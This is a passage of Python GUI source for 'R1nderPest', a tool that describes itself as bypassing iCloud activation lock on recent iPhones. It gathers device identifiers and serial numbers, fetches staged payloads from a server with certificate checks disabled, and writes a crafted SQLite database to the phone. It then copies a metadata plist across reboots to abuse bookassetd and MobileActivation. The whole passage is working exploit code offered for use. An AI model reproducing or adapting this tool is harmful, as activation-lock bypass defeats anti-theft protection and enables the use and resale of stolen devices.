        code, out, err = self._run_cmd(["curl", "-s", "-k", url])  # ← -k добавлено здесь
        if code != 0:
            self.log(text=f"Server request failed: {err}", type="error")
            return None, None, None

        try:
            data = json.loads(out)
            if data.get('success'):
                stage1_url = data['links']['step1_fixedfile']
                stage2_url = data['links']['step2_bldatabase']
                stage3_url = data['links']['step3_final']
                return stage1_url, stage2_url, stage3_url
            else:
                self.log(text="Server returned error response", type="error")
                return None, None, None
        except json.JSONDecodeError:
            self.log(text="Server did not return valid JSON", type="error")
            return None, None, None

    def preload_stage(self, stage_name, stage_url):
        """Pre-load individual stage with SSL bypass"""
        self.log(text=f"Pre-loading: {stage_name}...", type="info")
        
        # Используем нашу улучшенную функцию загрузки
        temp_file = f"temp_{stage_name}"
        success = self._curl_download(stage_url, temp_file)
        
        if success:
            self.log(text=f"Successfully pre-loaded {stage_name}", type="info")
            # Удаляем временный файл
            if os.path.exists(temp_file):
                os.remove(temp_file)
            return True
        else:
            self.log(text=f"Warning: Failed to pre-load {stage_name}", type="warning")
            self.activateButton.setText("❌ Failed to preload payload!")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            QtWidgets.QApplication.processEvents()
            return False
        
        


    ###############







    ## Other...



    def StartThread(self):
        process = threading.Thread(target=self.Hacktivating)
        process.start()

    def showPopup(self, title: str, text: str, type: str):
        msg_box = QMessageBox()
        msg_box.setText(text)
        msg_box.setWindowTitle(title)
        msg_box.setStandardButtons(QMessageBox.Ok)
        if type == "info":
            msg_box.setIcon(QMessageBox.Information)
        elif type == "warning":
            msg_box.setIcon(QMessageBox.Warning)
        msg_box.exec_()

    def Hacktivating(self):
        self.pbFrame.show()

        self.log(text="Process started!", type="success")

        self.activateButton.setText("⏳ Connecting to device...")

        time.sleep(0.4)

        process = subprocess.Popen(
                ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                stdin=subprocess.PIPE,
                text=True,
                bufsize=1
        )

        output = str(process.stdout.read())


        process.terminate()

        self.setProgress(progress=10)

        if "ERROR: No device found!" in output:
            self.log(text="Failed to connect to device!", type="error")
            self.log(text="Process finished with error.", type="error")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            self.activateButton.setText("❌ Failed to connect to device")
            QtWidgets.QApplication.processEvents()
        elif "ProductType" in output:
            self.log(text="Successfully conected to device!", type="success")
            self.activateButton.setText("⏳ Searching GUID (Attempt 1) ...")
            QtWidgets.QApplication.processEvents()
        else:
            self.log(text="Failed to connect to device!", type="error")
            self.log(text="Process finished with error.", type="error")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            self.activateButton.setText("❌ Failed to connect to device")
            QtWidgets.QApplication.processEvents()
            
        self.guid = self.get_guid_auto()


        print(self.global_GUID)

        self.setProgress(progress=20)

        self.activateButton.setText("⏳ Requesting payload...")
        QtWidgets.QApplication.processEvents()

        prd = output.split("ProductType: ")[1].split("\n")[0]
        sn = output.split("SerialNumber: ")[1].split("\n")[0]

        stage1_url, stage2_url, stage3_url = self.get_all_urls_from_server(prd, self.guid, sn)

        if not stage1_url or not stage2_url or not stage3_url:
            self.log(text="Failed to get URLs from server", type="error")
            self.activateButton.setText("❌ Failed to get URLs from server!")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        
        self.log(f"Stage1 URL: {stage1_url}", "info")
        self.log(f"Stage2 URL: {stage2_url}", "info")
        self.log(f"Stage3 URL: {stage3_url}", "info")

        self.setProgress(progress=30)

        self.activateButton.setText("⏳ Pre-loading payload...")
        QtWidgets.QApplication.processEvents()

        stages = [
            ("stage1", stage1_url),
            ("stage2", stage2_url), 
            ("stage3", stage3_url)
        ]
        
        for stage_name, stage_url in stages:
            self.preload_stage(stage_name, stage_url)
            time.sleep(1)

        self.setProgress(progress=50)

        self.log(text="Downloading final payload...", type="info")
        self.activateButton.setText("⏳ Downloading Payload...")
        QtWidgets.QApplication.processEvents()
        local_db = "downloads.28.sqlitedb"
        if os.path.exists(local_db):
            os.remove(local_db)
        
        # Используем улучшенную загрузку
        if not self._curl_download(stage3_url, local_db):
            self.log(text="Final payload download failed", type="error")
            self.activateButton.setText("❌ Failed to download payload!")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            QtWidgets.QApplication.processEvents()
            sys.exit(1)

        self.setProgress(progress=55)

        self.log(text="Validating payload database...", type="info")
        conn = sqlite3.connect(local_db)
        try:
            res = conn.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name='asset'")
            if res.fetchone()[0] == 0:
                raise Exception("Invalid DB - no asset table found")
            
            res = conn.execute("SELECT COUNT(*) FROM asset")
            count = res.fetchone()[0]
            if count == 0:
                raise Exception("Invalid DB - no records in asset table")
                
            self.log(f"Database validation passed - {count} records found", "info")
            
            res = conn.execute("SELECT pid, url, local_path FROM asset")
            for row in res.fetchall():
                self.log(text=f"Record {row[0]}: {row[1]} -> {row[2]}", type="info")
                
        except Exception as e:
            self.log(text=f"Invalid payload received: {e}", type="error")
            self.activateButton.setText("❌ Invalid Payload!")
            self.pb.setStyleSheet("""
            background-color: rgb(252, 0, 6);
            color: rgb(255, 255, 255);
            border-radius: 5px;
            """)
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        finally:
            conn.close()

        self.setProgress(progress=65)

        self.activateButton.setText("⏳ Uploading Payload...")
        QtWidgets.QApplication.processEvents()

        self.log("Uploading Payload via AFC...", "info")
        target = "/Downloads/downloads.28.sqlitedb"
        
        if self.afc_mode == "ifuse":
            if not self.mount_afc():
                self.log(text="Mounting failed — falling back to pymobiledevice3", type="warn")
                
                self.afc_mode = f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe"
        
        if self.afc_mode == "ifuse":
            fpath = self.mount_point + target
            if os.path.exists(fpath):
                os.remove(fpath)
            shutil.copy(local_db, fpath)
            self.log("Uploaded via ifuse", "info")
            
        else:
            self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "afc", "rm", target])
            code, _, err = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "afc", "push", local_db, target])
            if code != 0:
                self.log(f"AFC upload failed: {err}", "error")
                self.activateButton.setText("❌ Upload failed!")
                self.pb.setStyleSheet("""
                background-color: rgb(252, 0, 6);
                color: rgb(255, 255, 255);
                border-radius: 5px;
                """)
                QtWidgets.QApplication.processEvents()
                sys.exit(1)
            self.log("Uploaded via pymobiledevice3", "info")
            
        self.log(text="✅ Payload Deployed Successfully", type="success")

        self.setProgress(progress=75)

        self.activateButton.setText("⏳ Cleaning up files...")
        QtWidgets.QApplication.processEvents()
        
        self.log("Cleaning up WAL/SHM files in /Downloads...", "info")
        for wal_file in ["/Downloads/downloads.28.sqlitedb-wal", "/Downloads/downloads.28.sqlitedb-shm"]:
            if self.afc_mode == "ifuse":
                fpath = self.mount_point + wal_file
                if os.path.exists(fpath):
                    try:
                        os.remove(fpath)
                        self.log(f"Removed {wal_file} via ifuse", "info")
                    except Exception as e:
                        self.log(f"Failed to remove {wal_file}: {e}", "warn")
            else:
                code, _, err = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "afc", "rm", wal_file])
                if code == 0:
                    self.log(f"Removed {wal_file} via pymobiledevice3", "info")
                else:
                    if "ENOENT" not in err and "No such file" not in err:
                        self.log(f"Warning removing {wal_file}: {err}", "warn")
                    else:
                        self.log(f"{wal_file} not present — OK", "info")

        self.setProgress(progress=80)

        self.log("STAGE 1: First reboot + copy to /Books/...", "info")
        self.activateButton.setText("⏳ Rebooting device...")
        QtWidgets.QApplication.processEvents()
        if not self.reboot_device():
            self.log("First reboot failed — continuing anyway", "warn")

        self.log("Waiting 30 seconds for iTunesMetadata.plist to appear...", "info")
        
        self.activateButton.setText("⏳ Waiting for iTunesMetadata.plist")
        QtWidgets.QApplication.processEvents()
        for _ in range(5):  # 6 × 5s = 30s
            time.sleep(5)
            self.log("  ▫ Waiting...", "info")

        src = "/iTunes_Control/iTunes/iTunesMetadata.plist"
        dst_books = "/Books/iTunesMetadata.plist"

        def afc_copy(src_path, dst_path):
            try:
                if self.afc_mode == "ifuse":
                    if not self.mount_afc():
                        raise RuntimeError("ifuse remount failed")
                    src_local = self.mount_point + src_path
                    dst_local = self.mount_point + dst_path
                    if not os.path.exists(src_local) or os.path.getsize(src_local) == 0:
                        return False
                    os.makedirs(os.path.dirname(dst_local), exist_ok=True)
                    shutil.copy2(src_local, dst_local)
                    return True
                else:
                    tmp = "temp_plist_copy.plist"
                    code, _, err = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "afc", "pull", src_path, tmp])
                    if code != 0 or not os.path.exists(tmp) or os.path.getsize(tmp) == 0:
                        if os.path.exists(tmp):
                            os.remove(tmp)
                        return False
                    code2, _, err2 = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "afc", "push", tmp, dst_path])
                    os.remove(tmp)
                    return code2 == 0
            except Exception:
                return False

        # Copy → /Books/
        self.log(f"Copying {src} → {dst_books}...", "info")
        if afc_copy(src, dst_books):
            self.log("Copied to /Books/ successfully", "success")
            self.activateButton.setText("⏳ Rebooting device...")
            self.setProgress(progress=89)
            QtWidgets.QApplication.processEvents()
        else:
            self.log("/iTunes_Control/iTunes/iTunesMetadata.plist not found — skipping copy to /Books/", "warn")
            self.activateButton.setText("⏳ Rebooting device...")
            self.setProgress(progress=89)
            QtWidgets.QApplication.processEvents()

        self.log("STAGE 2: Second reboot + copy back to /iTunes_Control/...", "info")
        if not self.reboot_device():
            self.log("Second reboot failed — continuing anyway", "warn")

        self.activateButton.setText("⏳ Copying to /iTunesControl/ ")
        QtWidgets.QApplication.processEvents()

        self.setProgress(progress=90)

        # Copy back: /Books/ → /iTunes_Control/iTunes/
        self.log(f"Copying {dst_books} → {src}...", "info")
        if afc_copy(dst_books, src):
            self.log("Copied back to /iTunes_Control/ successfully", "success")
        else:
            self.log("/Books/iTunesMetadata.plist missing — copy-back skipped", "warn")
            
        self.log("Holding 15s for bookassetd...", "info")
        self.activateButton.setText("⏳ Waiting for bookassetd...")
        self.setProgress(progress=96)
        time.sleep(40)

        self.log("Final reboot to trigger MobileActivation...", "info")
        self.activateButton.setText("✅ Done! Activate your device as usual.")
        self.setProgress(progress=100)


        self.pb.setStyleSheet("""
        background-color: rgb(12, 255, 0);
        color: rgb(255, 255, 255);
        border-radius: 5px;
        """)
        self.reboot_device()

        


            

    def setProgress(self, progress: float):
        pbWIDTH = self.pb.width()

        newWidth = round(progress * 5.04)

        while pbWIDTH != newWidth:
            time.sleep(0.004)
            pbWIDTH += 1
            self.pb.setGeometry(0,0, pbWIDTH, 12)


    def SearchingDevices(self):
        if os.path.exists("C:/R1nderPest/conf.json"):

            while True:

                time.sleep(3)

                process = subprocess.Popen(
                    ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                    stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT,
                    stdin=subprocess.PIPE,
                    text=True,
                    bufsize=1
                )

                output = str(process.stdout.read())

                process.terminate()
            


                if "ERROR: No device found!\n" in output:
                    self.label_11.setText("⏳ Searching for devices...")
                else:
                    self.label_11.setText("✅ Connected!")

                    time.sleep(2.3)

                    try:
                        ProductVersion = output.split("ProductVersion: ")[1].split("\n")[0]
                        ProductType = output.split("ProductType: ")[1].split("\n")[0]
                        UDID = output.split("UniqueDeviceID: ")[1].split("\n")[0]
                        DeviceName = output.split("DeviceName: ")[1].split("\n")[0]
                        ActivationState = output.split("ActivationState: ")[1].split("\n")[0]
                    except:
                        self.log(text="Could not get device info!", type="error")
                        self.activateButton.setText("Could not get device info!")
                        QtWidgets.QApplication.processEvents()
                        sys.exit()
                        break

                    self.log(text="Device Connected!", type="success")
                    self.log(text=f"Detected device with: ", type="info")
                    self.log(text=f"    iOS Version: {ProductVersion}\n    Product Type: {ProductType}\n    UDID: {UDID}\n    Device Name: {DeviceName}", type="none")

                    self.Intro.hide()
                    self.HomePage.show()

                    self.DeviceName.setText(f"📱 {DeviceName}")
                    self.UDID.setText(f"UDID: {UDID}")
                    self.iOSVersion.setText(f"iOS Version: {ProductVersion}")
                    self.ProductType.setText(f"Product Type: {ProductType}")
                    self.ActivationState.setText(f"Activation State: {ActivationState}")

                    if ProductVersion == "26.1" or ProductVersion == "26.0.1" or ProductVersion == "26.0" or ProductVersion == "18.7.2" or ProductVersion == "18.7.1":
                        self.log(text=f"Device is {Fore.GREEN}SUPPORTED!{Fore.RESET}", type="success")
                        self.activateButton.setText("🚀 Activate device!")
                        self.activateButton.setStyleSheet("""
                        background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(21, 151, 255, 255), stop:1 rgba(113, 163, 168, 255));
                        color: rgb(255, 255, 255);
                        border-radius: 15px;                            
                        """)
                        self.ProductType_3.setText("SUPPORTED!")
                        self.ProductType_3.setStyleSheet("""
                        color: rgb(34, 255, 16);
                        background-color: rgba(255, 255, 255, 0);                                 
                        """)
                    else:
                        self.log(text=f"Device is {Fore.RED}UNSUPPORTED!{Fore.RESET}", type="error")
                        self.activateButton.setText("Unsupported")
                        self.activateButton.setDisabled(True)
                        self.activateButton.setStyleSheet("""
                        background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(255, 0, 0, 255), stop:1 rgba(143, 0, 0, 255));
                        color: rgb(255, 255, 255);
                        border-radius: 15px;                            
                        """)
                        self.ProductType_3.setText("UNSUPPORTED!")
                        self.ProductType_3.setStyleSheet("""
                        color: rgb(252, 0, 6);
                        background-color: rgba(255, 255, 255, 0);                                 
                        """)



                    break
        elif os.path.exists("C:/R1nderPest/conf1.json"):
            self.activateButton.setText("Installing dependencies...")
            QtWidgets.QApplication.processEvents()
            time.sleep(2)
            os.chdir("dependencies")
            subprocess.Popen(
                ['install2.bat']
            )
            file = open("C:/R1nderPest/conf.json", "a+")
            file.close()
            time.sleep(1)
            os._exit(1)
        else:
            self.activateButton.setText("Installing dependencies...")
            QtWidgets.QApplication.processEvents()
            time.sleep(2)
            os.chdir("dependencies")
            subprocess.Popen(
                ['install1.bat']
            )
            file = open("C:/R1nderPest/conf1.json", "a+")
            file.close()
            time.sleep(1)
            os._exit(1)
           
    def log(self, text: str, type: str):
        if type == "info":
            print(f"[{Fore.CYAN}i{Fore.RESET}]: {text}")
        elif type == "warning":
            print(f"[{Fore.YELLOW}⚠{Fore.RESET}]: {text}")
        elif type == "warn":
            print(f"[{Fore.YELLOW}⚠{Fore.RESET}]: {text}")
        elif type == "error":
            print(f"[{Fore.RED}✗{Fore.RESET}]: {text}")    
        elif type == "success":
            print(f"[{Fore.GREEN}✓{Fore.RESET}]: {text}")    
        elif type == "info":
            print(f"  ╰─▶ {text}")
        elif type == "progress":
            print(f"[⏳]: {text}")   
        else:
            print(text)




    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "R1nderpest A12+"))
        self.label_2.setText(_translate("MainWindow", "Welcome to R1nderPest!"))
        self.label_10.setText(_translate("MainWindow", "Welcome to R1nderPest! This tool will help you bypass iCloud on iPhone Xr - 16 Pro Max (iOS 18.7.2 and iOS 26.1). To get started, connect your device."))
        self.label_11.setText(_translate("MainWindow", "⌛️ Searching for devices..."))
        self.DeviceName.setText(_translate("MainWindow", "Device Name"))
        self.UDID.setText(_translate("MainWindow", "UDID: "))
        self.iOSVersion.setText(_translate("MainWindow", "iOS Version: "))
        self.ProductType.setText(_translate("MainWindow", "Product Type: "))
        self.ProductType_2.setText(_translate("MainWindow", "Your device is"))
        self.ProductType_3.setText(_translate("MainWindow", "SUPPORTED!"))
        self.activateButton.setText(_translate("MainWindow", "🚀 Activate device!"))
        self.ActivationState.setText(_translate("MainWindow", "Activation Status: Unactivated"))
        self.label_19.setText(_translate("MainWindow", "TextLabel"))
        self.DeviceName_3.setText(_translate("MainWindow", "Done!"))
        self.UDID_3.setText(_translate("MainWindow", "Thank you for using R1nderPest! Your device has been successfully activated! Please complete the initial setup as usual.\n"
"\n"
"If you encounter any issues, please run the bypass process again."))
        self.backToHomePage.setText(_translate("MainWindow", "◀️ Back to Home Page"))


if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
